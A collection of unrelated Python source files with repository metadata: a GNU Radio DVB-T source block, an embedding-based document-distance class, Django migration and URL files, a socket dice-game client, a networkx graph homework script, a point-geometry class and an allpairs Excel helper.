non_permissive
katsikas/gnuradio
https://github.com/katsikas/gnuradio
423887d68b55a7ffe993e280e2f861f381c64718
e7970cd27568ba86547aa2598372bef1643dc8ea
refs/heads/master
2016-09-16T01:25:07.695512
2012-10-05T06:40:58
2012-10-05T06:40:58
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python # # Copyright 2012 Free Software Foundation, Inc. # # This file is part of GNU Radio # # GNU Radio is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3, or (at your option) # any later version. # # GNU Radio is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GNU Radio; see the file COPYING. If not, write to # the Free Software Foundation, Inc., 51 Franklin Street, # Boston, MA 02110-1301, USA. # import sys import random import dvbt_swig from gnuradio import gr from dvbt_utils import * class dvbt_source(gr.hier_block2): """ Create an MPEG Transport stream source for DVBT.An MPEG TS consists of 4 header bytes and 184 data bytes. The rest 68 bytes in order to have a total of 256 byte packet are set to zero.(Padding) """ def __init__(self,file): """ Pad tranport stream packets to 256 bytes,add header bytes and reformat appropriately. @param ts: MPEG transport stream. @type ts: MPEG TS sequence of bytes; len(ts) % 188 == 0 """ ######################################################### # Python code for creating MPEG TS source and padding. #ts = create_transport_stream_packet(packets_number,file) #src = gr.file_source(gr.sizeof_char*1, file, False) #pad = pad_stream(ts, 256, 68) #src = gr.vector_source_b(ts,False,1) ######################################################### src = gr.file_source(gr.sizeof_char*1, file, False) pad = dvbt_swig.pad() #randomizer = dvbt_swig.randomizer() gr.hier_block2.__init__(self, "dvbt_source", gr.io_signature(0, 0, 0), pad.output_signature()) self.connect(src, pad, self)
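A hedged usage sketch for the hierarchical block above, in the same GNU Radio 3.6-era gr namespace the file uses; it assumes the out-of-tree dvbt module is installed and that the pad block emits single-byte items, and both file names are illustrative:

from gnuradio import gr

tb = gr.top_block()
src = dvbt_source("stream.ts")                     # MPEG TS input, len(ts) % 188 == 0
snk = gr.file_sink(gr.sizeof_char, "padded.bin")   # padded 256-byte packets out
tb.connect(src, snk)
tb.run()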
UTF-8
Python
false
false
2,012
19,593,640,820,479
b51ebfa7b68364f25cf1f4aefa3e9e3e5032557b
78dafe2d231c18ff59afc4015c92bd62130627e0
/code/PAD.py
1c401d18e44deaed90b29d716d1d61282bf77c4c
[]
no_license
nmonath/NLPProject
https://github.com/nmonath/NLPProject
c8c7932073176034b10de6a6987b01c86daea498
b32a696066a59f0a4e66d1d9f72c8152ad07dd06
refs/heads/master
2021-01-21T23:38:50.553645
2014-05-21T17:51:35
2014-05-21T17:51:35
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from sklearn.neighbors import KDTree from sklearn.preprocessing import normalize from sklearn.metrics import euclidean_distances import Word2VecExecuter import numpy as np from Features import Word import Features import copy class Document: def __init__(self, pred_arg_structures=None, embeddings=None, doc_file_name=None, word_index=None, model=None, use_lemma=True): Features.USE_LEMMA = use_lemma Features.REMOVE_FEATURES_ONLY_APPEARING_ONE_TIME = False Features.REMOVE_FEATURES_APPEARING_IN_ONLY_ONE_DOCUMENT = False Features.FREP = Features.FeatureRepresentation.STRING self.pred_arg_structures = pred_arg_structures self.use_lemma = use_lemma if (embeddings== None and doc_file_name==None and (not word_index == None) and (not model == None)): (word_index, embeddings) = Word2VecExecuter.Word2VecLoadWordsHashTable(model, word_index) embeddings = np.array(embeddings) elif (not doc_file_name == None) and (not model == None): Features.USE_LEMMA = use_lemma words = Features.ReadDependencyParseFile(doc_file_name, funit=Features.FeatureUnits.WORD, remove=False) (word_index, embeddings) = Word2VecExecuter.Word2VecLoadWordsHashTable(model, words) embeddings = np.array(embeddings) self.pred_arg_structures = Features.ReadDependencyParseFile(doc_file_name, funit=Features.FeatureUnits.PREDICATE_ARGUMENT, remove=False) del words self.embeddings = normalize(np.array(embeddings)) self.word_index = word_index def word_string(self, word): if self.use_lemma: return word.lemma else: return word.form def distance(self, other, theta=0.5): dist_self_to_other = 0 dist_other_to_self = 0 for pa1 in self.pred_arg_structures: mindist = np.Inf for pa2 in other.pred_arg_structures: curr_dist = self.dist_btw_two_pas(other, pa1, pa2) if curr_dist < mindist: mindist = curr_dist dist_self_to_other += mindist dist_self_to_other = dist_self_to_other / len(self.pred_arg_structures) for pa2 in other.pred_arg_structures: mindist = np.Inf for pa1 in self.pred_arg_structures: curr_dist = other.dist_btw_two_pas(self, pa2, pa1) if curr_dist < mindist: mindist = curr_dist dist_other_to_self += mindist dist_other_to_self = dist_other_to_self / len(other.pred_arg_structures) return dist_self_to_other*theta + dist_other_to_self*(1-theta) def dist_btw_two_pas(self, other, pa1, pa2): dist = 0 try: dist += euclidean_distances(self.embeddings[self.word_index[str(pa1.pred)], :], other.embeddings[other.word_index[str(pa2.pred)], :]) except: dist += 2 null_args = 0 for arg in pa1.args: if not arg in pa2.args: dist += 2 else: emb1 = None emb2 = None for w in pa1.args[arg]: if emb1 == None: try: emb1 = self.embeddings[self.word_index[str(w)], :] except: None else: try: emb1 = emb1 + self.embeddings[self.word_index[str(w)], :] except: None for w in pa2.args[arg]: if emb1 == None: try: emb1 = other.embeddings[other.word_index[str(w)], :] except: None else: try: emb1 = emb1 + other.embeddings[other.word_index[str(w)], :] except: None if not emb1 == None: if not emb2 == None: dist += euclidean_distances(emb1, emb2) else: dist += 2 else: null_args += 1 dist = dist / (len(pa1.args) + 1 - null_args) return dist def padist(self, pa_in_self, other, return_pa=False, penalty=2): mindist = 0; minpa = "" for pa_other in other.pred_arg_structures: dist = 0; terms_compared = 0; try: dist = dist + euclidean_distances(self.embeddings[self.word_index[self.word_string(pa_in_self.pred)]], other.embeddings[other.word_index[other.word_string(pa_other.pred)]]) terms_compared = terms_compared + 1 except: dist = dist + penalty terms_compared = terms_compared + 1 for 
arg_label_self in pa_in_self.args: emb_arg_self = None try: for w in pa_in_self.args[arg_label_self]: if emb_arg_self: try: emb_arg_self = emb_arg_self + self.embeddings[self.word_index[self.word_string(w)]] except: None else: try: emb_arg_self = self.embeddings[self.word_index[self.word_string(w)]] except: None except: None if not (emb_arg_self == None): terms_compared = terms_compared + 1 if arg_label_self in pa_other.args: emb_arg_other = None try: for w in pa_other.args[arg_label_self]: if emb_arg_other: try: emb_arg_other = emb_arg_other + other.embeddings[other.word_index[other.word_string(w)]] except: None else: try: emb_arg_other = other.embeddings[other.word_index[other.word_string(w)]] except: None dist = dist + euclidean_distances(emb_arg_self, emb_arg_other) except: dist = dist + penalty terms_compared = terms_compared + 1 else: dist = dist + penalty terms_compared = terms_compared + 1 if terms_compared > 0: dist = dist/terms_compared else: dist = 2 if dist < mindist: mindist = dist minpa = copy.deepcopy(pa_other) if return_pa: return (mindist, minpa) else: return mindist
UTF-8
Python
false
false
2,014
13,091,060,341,669
d4d145a494c14d16a52d58393ffeefc2784f9a32
b82ec8b87fe1bf6eeb38e1bafeacb83bb4e8bebd
/main/migrations/0001_initial.py
12b5a86c19371cce3c3377c61889b28e68d6b9cb
[]
no_license
rowama/tadlog
https://github.com/rowama/tadlog
6008eec63a9240c9306369ad4ba003398026bf17
e053b8cfcb3bf7df2871bd8d2b7cff1a02ccad32
refs/heads/master
2021-01-21T22:29:19.106784
2013-10-27T21:30:24
2013-10-27T21:30:24
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'Tad' db.create_table(u'main_tad', ( (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('created_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)), ('modified_time', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)), ('logged_time', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)), ('note', self.gf('django.db.models.fields.TextField')()), )) db.send_create_signal(u'main', ['Tad']) # Adding M2M table for field tags on 'Tad' m2m_table_name = db.shorten_name(u'main_tad_tags') db.create_table(m2m_table_name, ( ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)), ('tad', models.ForeignKey(orm[u'main.tad'], null=False)), ('tag', models.ForeignKey(orm[u'main.tag'], null=False)) )) db.create_unique(m2m_table_name, ['tad_id', 'tag_id']) # Adding model 'Tag' db.create_table(u'main_tag', ( (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('name', self.gf('django.db.models.fields.CharField')(max_length=50)), )) db.send_create_signal(u'main', ['Tag']) def backwards(self, orm): # Deleting model 'Tad' db.delete_table(u'main_tad') # Removing M2M table for field tags on 'Tad' db.delete_table(db.shorten_name(u'main_tad_tags')) # Deleting model 'Tag' db.delete_table(u'main_tag') models = { u'main.tad': { 'Meta': {'object_name': 'Tad'}, 'created_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'logged_time': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}), 'modified_time': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}), 'note': ('django.db.models.fields.TextField', [], {}), 'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['main.Tag']", 'symmetrical': 'False'}) }, u'main.tag': { 'Meta': {'object_name': 'Tag'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) } } complete_apps = ['main']
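For reference, models matching this initial migration would look roughly like the following; this is reconstructed from the field definitions above, not copied from the repository:

from django.db import models

class Tag(models.Model):
    name = models.CharField(max_length=50)

class Tad(models.Model):
    created_time = models.DateTimeField(auto_now_add=True, blank=True)
    modified_time = models.DateTimeField(auto_now=True, blank=True)
    logged_time = models.DateTimeField(auto_now=True, blank=True)
    note = models.TextField()
    tags = models.ManyToManyField(Tag)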
UTF-8
Python
false
false
2,013
18,210,661,337,157
be10ea3266650f3d1902d100f4bac7d143023dc0
fe9cf2b0bb60cf0817699704ed59d8e7c0f81e91
/src/ska/contrib/django/ska/urls.py
625e9305a3fb055c8f51b3db7c86536a0dab5052
[ "LGPL-2.1-only", "LGPL-2.1-or-later", "GPL-1.0-or-later", "LicenseRef-scancode-warranty-disclaimer", "GPL-2.0-or-later", "GPL-2.0-only" ]
non_permissive
luzfcb/ska
https://github.com/luzfcb/ska
63cae8db239faed47912f7099921b7a8508a0ca4
102fa32cab4fa5799b8655b17c3da2bd3f14562c
refs/heads/master
2021-01-15T20:22:52.418879
2014-06-07T21:52:17
2014-06-07T21:52:17
42,519,296
1
0
null
true
2015-09-15T12:56:31
2015-09-15T12:56:30
2015-09-15T12:55:32
2014-06-07T21:52:22
984
0
0
0
null
null
null
__title__ = 'ska.contrib.django.ska.urls'
__author__ = 'Artur Barseghyan'
__copyright__ = 'Copyright (c) 2013 Artur Barseghyan'
__license__ = 'GPL 2.0/LGPL 2.1'
__all__ = ('urlpatterns',)

from django.conf.urls import patterns, url

from ska.contrib.django.ska.views import login

urlpatterns = patterns('',
    url(r'^login/', login, name="ska.login"),
)
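A project would typically mount these patterns under a prefix; a minimal sketch in the same Django 1.x style, where the ^ska/ prefix is illustrative:

from django.conf.urls import patterns, include, url

urlpatterns = patterns('',
    url(r'^ska/', include('ska.contrib.django.ska.urls')),
)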
UTF-8
Python
false
false
2,014
1,529,008,361,439
698a130aa2ac15da128a9a277617f3af9e513ca9
5edf7cd9dc43c76c07ce047c86ed4dc00159b77e
/fp/client.py
16a7c1d6ddffc19911a293bc68d5d3079a5a04f9
[]
no_license
5109100090/progjar
https://github.com/5109100090/progjar
077b74120221d23f39c070fbd432a8a4ceb7d683
f47424a88dabb687b6c8085e430a00b1561964c8
refs/heads/master
2023-05-12T23:01:34.763108
2013-01-01T11:31:53
2013-01-01T11:31:53
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python import socket, random, threading, time class game(threading.Thread): def __init__(self,s): threading.Thread.__init__(self) self.s = s self.stoptrigger = threading.Event() def stop(self): self.stoptrigger.set() def run(self): while not self.stoptrigger.isSet(): running = 1 while running : #print 'waiting response from server ...' msg = self.s.recv(1024) rd = msg.split('###') if rd[0] == 'BROADCAST': print rd[1] elif rd[0] == 'PLAY' : print rd[1] msg = raw_input() if msg == 'r' : msg = str(random.randint(1,6)) self.s.send(msg) #if msg == 'exit': # self.stop() class recv(threading.Thread): def __init__(self,s,sen): threading.Thread.__init__(self) self.s = s self.sen = sen self.stoptrigger = threading.Event() def stop(self): self.stoptrigger.set() def run(self): while not self.stoptrigger.isSet(): msg = self.s.recv(1024) rd = msg.split('###') #if rd[0] == 'start' : # print rd[1] # self.stop() # self.sen.stop() # g = game(self.s) # g.start() # break if rd[0] == 'FINISH': print rd[1] self.s.close() #close socket self.sen.stop() #stop send thread self.stop() #stop this thread break if msg == 'exit': print 'bye.' self.sen.stop() self.stop() elif len(rd) == 1: print msg elif len(rd) == 2: print rd[1] class send(threading.Thread): def __init__(self,s): threading.Thread.__init__(self) self.s = s self.stoptrigger = threading.Event() def stop(self): self.stoptrigger.set() def run(self): while not self.stoptrigger.isSet(): msg = raw_input() if msg == 'r' : msg = str(random.randint(1,6)) print 'dice : ' + msg elif msg == 'exit': self.stop() else: m = 0 self.s.send(msg) if __name__ == "__main__": IP = '10.151.36.39' PORT = 6000 ADDR = (IP,PORT) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(ADDR) sen = send(s) sen.start() rec = recv(s, sen) rec.start()
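A minimal counterpart server for exercising the client by hand; the "TAG###text" framing is inferred from the client's split('###') handling, and the bind address, port, and message texts are illustrative:

import socket

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind(('0.0.0.0', 6000))
srv.listen(1)
conn, addr = srv.accept()
conn.send('BROADCAST###a player connected')
conn.send('PLAY###press r to roll the dice')
dice = conn.recv(1024)                                  # the client replies with its roll
conn.send('FINISH###you rolled %s, game over' % dice)
conn.close()
srv.close()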
UTF-8
Python
false
false
2,013
11,304,353,930,063
0a66ac89421dca6a956e95786d4029a48cdc0b82
2967c0d3c7ec878f436da69e919d57b18cb83de4
/CS 224W/corn/hwk2.py
ab36bcb9172aca1ca25e13c577e1673367d6d6c8
[]
no_license
ryanefoley/repo3
https://github.com/ryanefoley/repo3
e14d5096c45d827dca9130f81b93b945011c8383
afa9fe038f655e2f6b40040ff4b16ff786b2bc85
refs/heads/master
2016-08-08T15:22:00.735742
2013-01-06T23:52:30
2013-01-06T23:52:30
7,474,291
3
13
null
null
null
null
null
null
null
null
null
null
null
null
null
import matplotlib.pyplot as plt import matplotlib import networkx as nx from random import * import excess_degree as ed #Problem 1a n = 5242 m = 14496 #Gnm Graph print "Creating Gnm Graph..." gnm = nx.gnm_random_graph(n, m) #Small world graph def small_world(): print "Creating small world..." sw = nx.Graph() #create ring for i in range(n): if(i == n-1): sw.add_edge(i, 0) sw.add_edge(i, 1) else: if(i == n-2): sw.add_edge(i, i+1) sw.add_edge(i, 0) else: sw.add_edge(i, i+2) sw.add_edge(i, i+1) iters = 4012 iter = 0 while(iter < iters): n1 = randint(0, n-1) n2 = randint(0, n-1) if(n1 != n2 and (n1,n2) not in sw.edges() and (n2,n1) not in sw.edges()): sw.add_edge(n1,n2) iter += 1 return sw sw = small_world() #Real-World Collaboration Network print "Reading Real-World graph..." rw = nx.read_adjlist("ca-GrQc.txt", create_using=nx.DiGraph()) print "Plotting..." degree_sequence=sorted(nx.degree(gnm).values(),reverse=True) # degree sequenc p1, = plt.loglog(degree_sequence,'b-',marker='o') degree_sequence=sorted(nx.degree(sw).values(),reverse=True) # degree sequenc p2, = plt.loglog(degree_sequence,'r-',marker='o') degree_sequence=sorted(nx.degree(rw).values(),reverse=True) # degree sequenc p3, = plt.loglog(degree_sequence,'y-',marker='o') plt.title("Degree rank plot") plt.ylabel("degree") plt.xlabel("rank") plt.legend([p1, p2, p3], ["Gnm", "Small-World", "Real-World"]) plt.savefig("degree_histogram.png") plt.close() #from collections import Counter degree_sequence1=sorted(nx.degree(gnm).values(),reverse=True) degree_sequence2=sorted(nx.degree(sw).values(),reverse=True) degree_sequence3=sorted(nx.degree(rw).values(),reverse=True) counts1 = Counter(degree_sequence1) counts2 = Counter(degree_sequence2) counts3 = Counter(degree_sequence3) p1, = plt.loglog(counts1.items(),'b-',marker='o') p2, = plt.loglog(counts2.items(),'r-',marker='o') p3, = plt.loglog(counts3.items(),'y-',marker='o') plt.title("Degree rank plot") plt.ylabel("degree") plt.xlabel("rank") plt.legend([p1, p2, p3], ["Gnm", "Small-World", "Real-World"]) plt.savefig("degree_histogram.png") plt.close() counts1 = {} counts2 = {} counts3 = {} for i in range(len(degree_sequence1)): if(i in counts1): counts1[i] += 1 else: counts1[i] = 1 for i in range(len(degree_sequence1)): if(i in counts1): counts1[i] += 1 else: counts1[i] = 1 for i in range(len(degree_sequence1)): if(i in counts1): counts1[i] += 1 else: counts1[i] = 1 p1, = plt.loglog(counts1,'b-',marker='o') p2, = plt.loglog(counts2,'r-',marker='o') p3, = plt.loglog(counts3,'y-',marker='o') plt.title("Degree rank plot") plt.ylabel("degree") plt.xlabel("rank") plt.legend([p1, p2, p3], ["Gnm", "Small-World", "Real-World"]) plt.savefig("test3.png") plt.close() #1b - getting excess degree histograms q = ed.excess_degree(gnm) p1, = plt.loglog(q,'b-',marker='o') q = ed.excess_degree(sw) p2, = plt.loglog(q,'r-',marker='o') q = ed.excess_degree(rw) p3, = plt.loglog(q,'y-',marker='o') plt.title("Excess Degree Distribution") plt.ylabel("excess degree") plt.xlabel("k") plt.legend([p1, p2, p3], ["Gnm", "Small-World", "Real-World"]) plt.savefig("excess_degree_histogram.png") plt.close()
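Note that the script calls Counter() although the "from collections import Counter" line is commented out. A self-contained sketch of the degree-count plot it is building, using the networkx 1.x dict-returning degree API the rest of the script relies on:

from collections import Counter
import matplotlib.pyplot as plt
import networkx as nx

g = nx.gnm_random_graph(5242, 14496)
counts = Counter(nx.degree(g).values())       # degree -> number of nodes with that degree
degrees = sorted(counts)
plt.loglog(degrees, [counts[d] for d in degrees], 'b-', marker='o')
plt.xlabel("degree")
plt.ylabel("count")
plt.savefig("degree_distribution.png")
plt.close()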
UTF-8
Python
false
false
2,013
15,315,853,419,983
0246768c24dba5cf4662ac9d69716f760618f6fa
cda2adff398d4165e431194df3bc8a0ba2facce0
/newecosystems/apps/core/adminurls.py
3f2660d7faf3eb7ff019a67996715190df86b1a4
[ "MIT" ]
permissive
dparizek/newecosystems
https://github.com/dparizek/newecosystems
09ebae05e9c0326536321e3814cbdede686b35ae
6dfe8e8b5706ea6ccbe18a5f473d2d66b9f3a233
refs/heads/master
2020-12-25T19:14:50.446304
2014-06-26T05:47:02
2014-06-26T05:47:02
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.conf.urls import * urlpatterns = patterns('', url(r'^$', 'apps.core.adminviews.plantAdminIndex'), url(r'generate-static-files/$', 'apps.core.adminviews.generateStaticFiles'), url(r'fetch-from-firefly/$', 'apps.core.adminviews.fetchFromFirefly'), url(r'process-firefly-data/$', 'apps.core.adminviews.processFireflyData'), url(r'parse-out-firefly/$', 'apps.core.adminviews.parseOutFirefly'), url(r'redo-slugs/$', 'apps.core.adminviews.redoSlugs'), )
UTF-8
Python
false
false
2,014
12,000,138,638,334
e81489ed8f8062dc8d8350a2b8bac0c372dc204f
bc49e3d8f85c1839ec3afeb14eb056b50cfef9d7
/src-1.0.10-beta/nanocap/core/points.py
fca76cd7944c4b7ccac6fb17baffc1cd9de8abf9
[ "LicenseRef-scancode-proprietary-license", "CC-BY-NC-2.5" ]
non_permissive
CurtinIC/nanocap
https://github.com/CurtinIC/nanocap
968b1ce98356a0ceb9c0432c0b8c8e353cf3d572
d90949d77ee2ae28a87c8bcf853a0488bab7619f
refs/heads/master
2021-01-25T06:44:48.927742
2014-05-29T06:20:33
2014-05-29T06:20:33
93,600,398
2
0
null
null
null
null
null
null
null
null
null
null
null
null
null
''' -=-=-=-=-=-=-= NanoCap -=-=-=-=-=-=-= Created: Aug 24 2011 Copyright Marc Robinson 2013 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Points class for holding positions, freeflags etc Functions to get bounds, centers, NNdists etc. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ''' from nanocap.core.globals import * from nanocap.core.util import * import os,sys,math,copy,random,time import numpy class Points(object): def __init__(self,PointSetLabel): self.PointSetLabel = PointSetLabel self.final_energy = 0 self.final_scale_energy = 0 self.final_scale = 0 def setLabel(self,lab): self.PointSetLabel = lab def getCenter(self): b = self.getBounds() return numpy.array([(b[0]+b[3])*0.5,(b[1]+b[4])*0.5,(b[2]+b[5])*0.5]) def getBounds(self): if(self.npoints==0): return 0,0,0,0,0,0 x,y,z = self.pos[0::3],self.pos[1::3],self.pos[2::3] return numpy.min(x),numpy.min(y),numpy.min(z),numpy.max(x),numpy.max(y),numpy.max(z) def getNNdist(self,ncheck=1): avr2 = [] for i in range(0,ncheck): xd = self.pos[i] - self.pos[0::3] yd = self.pos[i] - self.pos[1::3] zd = self.pos[i] - self.pos[2::3] r2 = xd*xd + yd*yd + zd*zd r2 = numpy.delete(r2,i) avr2.append(numpy.min(r2)) return math.sqrt(numpy.average(avr2)) def initArrays(self,npoints,free=True,damp=False): self.npoints = npoints self.pos = numpy.zeros(npoints*3,NPF) self.pos0 = numpy.zeros(npoints*3,NPF) if(free): self.freeflagspos = numpy.ones(npoints*3,NPF) self.freeflags = numpy.ones(npoints,NPF) else: self.freeflagspos = numpy.zeros(npoints*3,NPF) self.freeflags = numpy.zeros(npoints,NPF) if(damp): self.dampflagspos = numpy.ones(npoints*3,NPF) self.dampflags = numpy.ones(npoints,NPF) else: self.dampflagspos = numpy.zeros(npoints*3,NPF) self.dampflags = numpy.zeros(npoints,NPF) def reset(self,npoints): self.npoints = npoints self.pos = numpy.zeros(npoints*3,NPF) def removeIndexes(self,indexes): self.npoints -= len(indexes) posindexes = numpy.concatenate((indexes*3,indexes*3+1,indexes*3+2)) self.pos = numpy.delete(self.pos,posindexes) try:self.freeflagspos = numpy.delete(self.freeflagspos,posindexes) except:pass try:self.freeflags = numpy.delete(self.freeflags,indexes) except:pass def getPoint(self,index): return numpy.array([self.pos[index*3],self.pos[index*3+1],self.pos[index*3+2]]) def __str__(self): return "PointSet: "+str(self.PointSetLabel) def joinPointSets(sets): out = Points("") np = 0 pos = [] pos0 = [] freeflags = [] freeflagspos = [] dampflags = [] dampflagspos = [] for set in sets: np += set.npoints pos0.append(set.pos0) pos.append(set.pos) freeflagspos.append(set.freeflagspos) freeflags.append(set.freeflags) #dampflagspos.append(set.dampflagspos) #dampflags.append(set.dampflags) out.initArrays(np) out.pos = numpy.concatenate(pos) out.pos0 = numpy.concatenate(pos0) out.freeflagspos = numpy.concatenate(freeflagspos) out.freeflags = numpy.concatenate(freeflags) #out.dampflagspos = numpy.concatenate(dampflagspos) #out.dampflags = numpy.concatenate(dampflags) return out
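A small usage sketch for the Points container above; it assumes NPF (imported from nanocap.core.globals) is a numpy float dtype, as the allocations suggest, and the coordinates are illustrative:

import numpy

p = Points("demo")
p.initArrays(3)
p.pos = numpy.array([0.0, 0.0, 0.0,
                     1.0, 0.0, 0.0,
                     0.0, 2.0, 0.0])   # flat [x0, y0, z0, x1, y1, z1, ...] layout
print p.getBounds()                    # (xmin, ymin, zmin, xmax, ymax, zmax)
print p.getCenter()                    # centre of that bounding box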
UTF-8
Python
false
false
2,014
12,610,023,994,664
260d129172574db3884dc539d553e04d25ed86df
9f7112ef15c1f05c71faa031d1bfc6d30c811d7e
/python/pieces/histogram.py
5e8a392b4e6460fd1bf22947979c6008dc8c4907
[]
no_license
VijayEluri/codes
https://github.com/VijayEluri/codes
62dce4a771cd73973bef318c132e1b8d08ee33d5
1fe24121bbeb98b3c0b6bf719219152b16b34159
refs/heads/master
2020-05-20T11:13:26.525288
2013-05-14T02:14:48
2013-05-14T02:14:48
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#~ -*-coding:utf-8-*-
def histogram(dizge):
    str = dizge.lower()
    nharf = {}
    for harf in str:
        if harf.isalpha():
            nharf[harf] = nharf.get(harf, 0) + 1
    a = nharf.keys()
    b = nharf.values()
    for i in range(len(a)):
        print a[i], ":", b[i]

#histogram("sefa ali veli selami kara goz kara kas besiktas samsunspor")
UTF-8
Python
false
false
2,013
18,880,676,266,410
9c4e57b700dd0273fa8820f74b468f012629bd43
0165c8079b08e465c46789526d157ab0ac8ae188
/iki/contrib/photo/models.py
25fabbc4dcb38ed37a845aed56ef441bd5f065d1
[]
no_license
callard/iki
https://github.com/callard/iki
372dce384ff88b5b28c206e36e02dbb90f0a84e8
c5402725fb00b81f58e12609255b29a801e457c0
refs/heads/master
2021-01-01T16:24:57.488972
2007-11-06T23:49:41
2007-11-06T23:49:41
32,188,421
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- encoding: utf-8 -*- """Photo contrib application : models """ import datetime import random from django.db import models from django.contrib.auth.models import User # i18n from django.utils.translation import gettext_lazy as _ # magic iki stuff ;) from iki.core.media import Media class Album(models.Model): name = models.CharField(_("name"), maxlength=25, db_index=True, help_text=_('Name of your album')) slug = models.SlugField(_("slug"), prepopulate_from=['name'], help_text=_('Automatically built from the name'),) desc = models.TextField(_("description"), db_index=True, help_text=_('Description'), blank=True) owner = models.ForeignKey(User, verbose_name=_("Owner")) class Meta: unique_together=(('name', 'owner'),) class Admin: list_display = ('name', 'owner',) list_filter = ('owner',) search_fields = ('name', 'desc',) ordering = ('name',) def __unicode__(self): return u"%s" % self.name def __str__(self): return "%s" % self.name def save(self): super(Album, self).save() def get_absolute_url(self): raise NotImplementedError class Photo(Media): """Photo model for iki You just have to define here the non-common field (the others are define elsewhere, in Media) >>> p1 = Photo() """ album = models.ForeignKey(Album, verbose_name=_("Album"), null=True, blank=True)
UTF-8
Python
false
false
2,007
12,309,376,271,949
dd8983317818331e9894432276b2a75a41d56580
c64731600c594ac34a1df04924f13a715d651fef
/parser.py
833d2e48b200f04cc4966ae377405799ae86f984
[]
no_license
willdrevno/unitconverter
https://github.com/willdrevno/unitconverter
8adb7f6b9842bbad000df0fc587cd81c978a9a5f
bbac9dc7bfe4e3b25a981525a7d42282d1bf7853
refs/heads/master
2016-09-06T19:25:38.393121
2013-05-07T06:39:35
2013-05-07T06:39:35
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
""" The parser takes in a string formatted as follows: AMOUNT SOURCE_UNIT in DESTINATION_UNIT and outputs the relavent components as an array """ def parser(string): sepstring = string.split(' ') #breaks the string into parts of an array wherever there is a space return sepstring
UTF-8
Python
false
false
2,013
15,891,378,997,537
08a1cecc915da27de894233560efef1bd31adbea
3cde22e51e7fd01c0aec274ea29034bee8f3adbe
/Related Recommend Interface Test/src/R-3/Parse/allpair1s.py
6ad0b0acde15158ac39d4b6854e9fa3c18db2247
[]
no_license
ynztyl10/RelatedCommand-youku
https://github.com/ynztyl10/RelatedCommand-youku
87deae326b988d107132de831ea9208e61add236
1c5738b52b3044a15d2a975ea5a4610b8842cb62
refs/heads/master
2015-07-23T06:13:14
2012-08-15T02:25:36
2012-08-15T02:25:36
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#coding:utf-8 ''' Created on Jul 3, 2012 @author: DUNG ''' import xlrd from myparser import * import os,sys,re def time(func): import time def Function(*args1,**args2): start_time = time.time() back = func(*args1,**args2) end_time = time.time() print "%.10fs taken for (%s)" % (end_time-start_time,func.__name__) return back return Function def get_tmp_txt(bk,sheets): for sheet in sheets: try: sheet_txt = file("tmp_"+sheet+".txt","w") sh = bk.sheet_by_name(sheet) nrows = sh.nrows ncols = sh.ncols for row in range(nrows): for col in range(ncols): cell_data = sh.cell_value(row,col) if col != ncols-1: sheet_txt.write(cell_data+"\t") else: sheet_txt.write(cell_data+"\n") finally: sheet_txt.close() def get_tmp_txt_name(): path = os.path.abspath(os.getcwd()) files = os.listdir(path) test = re.compile(r"^tmp_.*\.txt$", re.IGNORECASE) tmp_txt_files = filter(test.search, files) return tmp_txt_files def get_allpairs_txt(sheets,tmp_txt_files): allpairs_txt_names = [] for sheet,tmp_txt in zip(sheets,tmp_txt_files): allpairs_txt_name = "allpairs_"+sheet+".txt" os.system("allpairs "+tmp_txt+">"+allpairs_txt_name) allpairs_txt_names.append(allpairs_txt_name) return allpairs_txt_names def delete_tmp_txts(tmp_txt_files): path = os.path.abspath(os.getcwd()) for tmp_txt_file in tmp_txt_files: os.remove(path+"\\"+tmp_txt_file) def update_excel_file(excel_file,sheets,allpairs_txt_names): pass def all_pairs(): excel_file = sys.argv[1] bk = xlrd.open_workbook(excel_file) sheets = bk.sheet_names() get_tmp_txt(bk,sheets) tmp_txt_files = get_tmp_txt_name() allpairs_txt_names = get_allpairs_txt(sheets, tmp_txt_files) delete_tmp_txts(tmp_txt_files) update_excel_file(excel_file, sheets, allpairs_txt_names) all_pairs()
UTF-8
Python
false
false
2,012
8,452,495,682,974
28feade8d478279dc9040c3ca6cd0614a1e62f9b
2be91d9d16821dda202a6f14438c21161394b6bc
/query_model/query_urls.py
dd1c02509885034fd77e4ab2e2950bad7ef0b9ef
[]
no_license
dmr/query-model
https://github.com/dmr/query-model
fe11e8e033e81b091632d006b0c2c031c8c71fb2
3a0f9442ee6a3133f6e9ca6c9c2bac6202cf5926
refs/heads/master
2018-12-28T07:20:32.646907
2013-01-09T01:43:40
